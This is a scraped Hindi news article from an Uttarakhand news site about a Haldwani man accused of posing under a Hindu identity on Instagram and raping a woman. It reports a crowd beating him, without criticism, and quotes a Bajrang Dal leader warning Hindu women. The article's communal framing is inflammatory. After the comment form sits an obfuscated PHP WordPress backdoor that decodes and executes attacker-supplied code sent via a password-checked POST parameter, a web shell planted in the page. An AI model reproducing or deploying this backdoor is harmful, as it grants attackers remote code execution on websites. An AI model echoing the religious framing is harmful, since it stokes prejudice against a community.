Haldwani: युवक ने हिंदू बनकर दो साल तक किया प्‍यार का नाटक, फिर दुष्‍कर्म, हिंदू युवतियों को सावधान रहने की जरूरत

Uttarakhand Press News, 12 May 2023: कार की सवारी और बुलेट से फर्राटा भरने वाले फरमूद की असल पहचान एक फर्जी और झूठे की थी, लेकिन पीड़िता दो साल तक उसे अनमोल ही समझती रही। असलियत सामने आई तो पैरों तले से जमीन खिसक गई।

इंस्टाग्राम में युवक ने अनमोल बाजपुर वाले के नाम से आइडी बना रखी थी। थाने में देर रात गुस्साई भीड़ फरमूद को उनके हवाले करने की मांग करती रही। मामले की संवेदनशीलता को देखते हुए सीओ भूपेंद्र धौनी थाने में डटे रहे। एसओ काठगोदाम समेत एलआइयू की टीम भी जानकारी जुटाने में लगी हुई थी।

खुद को हाईफाई दिखाने की कोशिश करता था फरमूद:
आरोपित फरमूद ने पीड़ित युवती को पूरी तरह अपने झांसे में ले रखा था। युवती को उस पर काफी भरोसा था। इसलिए उसने शादी तक की सोची। एक बार उसके घर बरहैनी भी गई। स्थानीय लोगों का कहना था कि युवक कार और बुलेट से घूमकर खुद को हाईफाई दिखाने की कोशिश करता था।

वहीं, युवती ने जब दोनों के बीच के रिश्ते को पारिवारिक तौर पर जोड़ने (शादी) की बात कही तो उसका असल रंग दिखने लगा। पहले गुमराह करता रहा। वहीं, जब असलियत सामने आई कि अनमोल फरमूद हसन है तो युवती के होश उड़ गए।

दूसरी तरफ फरमूद जान से मारने और समाज में बदनाम करने की धमकी देने लगा। दिन भर सदमे में रही युवती ने रात में किसी तरह हिम्मत जुटा फरमूद की साजिश को तहरीर के माध्यम से बताया तो पुलिस ने भी तुरंत मामला दर्ज कर लिया।

पहले गली फिर थाने में पीटा:
फरमूद गोविंदपुर गरवाल में किराए पर रहता था। स्थानीय लोगों को उस पर शक था। इसलिए उन्होंने इसे ट्रेस करना शुरू किया। पुख्ता कर लिया कि वो पहचान बदल लड़कियों से दोस्ती गांठता है। गुरुवार सुबह पहले कुछ लोग उसके किराये के घर पहुंचे। जिसके बाद मकान मालिक से कहा कि उसे बुलाए।

घर पहुंचा फरमूद बहस करने लगा तो लोगों ने उसे पीटा। इसके बाद आरटीओ चौकी पहुंचा दिया। लेकिन तहरीर न मिलने की वजह से दिन में कार्रवाई नहीं हुई। रात आठ बजे करीब बड़ी संख्या में लोग थाने पहुंच गए। जहां फरमूद की फिर धुनाई हुई। इस बीच युवती के स्वजन पहुंचे। पुलिस भी सक्रिय हुई। जिसके बाद तहरीर मिलते ही प्राथमिकी दर्ज कर ली गई।

हिंदू युवतियों को सावधान रहने की जरूरत:
बजरंग दल के जिला संयोजक जोगेंद्र सिंह राणा कार्यकर्ताओं संग सुबह से इस मामले को सामने लाने में जुटे थे। राणा ने कहा कि हिंदू युवतियों को इन नाम बदलकर शोषण करने वाले बहरूपियों से सावधान रहने की जरूरत है। पुलिस की मदद से इनकी असलियत सामने लाना जरूरी है।

Read Previous

Uttarakhand: पिथौरागढ़ में युवक ने अपनी ही ताई, चचेरी बहन व भाभी को काट डाला, जाने क्या है पूरा मामला

Read Next

खेलते-खेलते पानी की बाल्टी में गिरा डेढ़ साल का मासूम, डूबने से हुई मौत…

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}